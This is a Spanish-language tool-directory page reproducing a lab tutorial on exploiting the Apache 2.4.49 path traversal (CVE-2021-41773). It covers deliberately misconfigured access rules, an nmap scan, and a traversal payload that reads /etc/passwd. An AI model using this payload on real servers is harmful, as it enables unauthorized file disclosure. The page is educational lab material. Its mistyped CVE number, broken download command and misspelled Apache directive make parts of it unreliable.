Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-4773 — Tutorial paso a paso que demuestra cómo configurar un entorno vulnerable de Apache 2.4.49 y explotar el path traversal de CVE-2021-41773 usando máquinas virtuales de Kali Linux y Ubuntu Server. | Kitploit
Herramientas/GitHubGitHub/alexs18/cve-2021-4773
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubalexs18/cve-2021-4773

CVE-2021-4773

Tutorial paso a paso que demuestra cómo configurar un entorno vulnerable de Apache 2.4.49 y explotar el path traversal de CVE-2021-41773 usando máquinas virtuales de Kali Linux y Ubuntu Server.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-4773

este es un ejemplo práctico de cómo explotar la vulnerabilidad CVE-2021-4773 con una máquina virtual

para este tutorial necesitas lo siguiente

  • una máquina virtual como Kali Linux
  • una máquina virtual como Ubuntu Server
  • instalar Apache versión 2.4.49

así que empecemos cuando tengas 2 máquinas virtuales en ejecución, instalarás Apache versión 2.4.49 desde un repositorio de archivos puedes encontrar la versión aquí https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Instalar y configurar la versión vulnerable en Ubuntu Server

1 la primera vez en tu servidor de máquina virtual necesitas ejecutar el siguiente comando

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 la segunda vez necesitas descomprimir esta versión de Apache así

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 instala los siguientes paquetes

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 ejecuta el archivo ejecutable en el directorio principal (el archivo configure) y usa el flag para especificar el directorio de instalación

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 compila la versión vulnerable

root@kitploit:~
make

6 instala la versión vulnerable

root@kitploit:~
make install

7 revisa la versión

root@kitploit:~
ls /usr/local/apache2

8 inicia el proceso

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 verifica el proceso

root@kitploit:~
ps aux | grep httpd

10 configura la vulnerabilidad encuentra el archivo /usr/local/apache2/conf/httpd.conf y configura el directorio admin encuentra la etiqueta directory y cambia Require all denied a

root@kitploit:~
  Required all granted
  

encuentra la etiqueta Files .ht* y cambia Required all denied a

root@kitploit:~
  Required all granted

el primer cambio es para explotar la vulnerabilidad en el entorno local y el segundo es la exposición en el entorno real

Explotar la vulnerabilidad en Kali Linux

1 escanea la dirección IP con nmap con el siguiente comando

root@kitploit:~
nmap -sV ip_address

2 haz una petición curl o wget para probar el servidor Apache

root@kitploit:~
curl ip_address or make wget ip_address

3 revisa cómo explotar la vulnerabilidad en la siguiente página si quieres entender la sintaxis

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

o simplemente usa el siguiente payload

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Descargar herramienta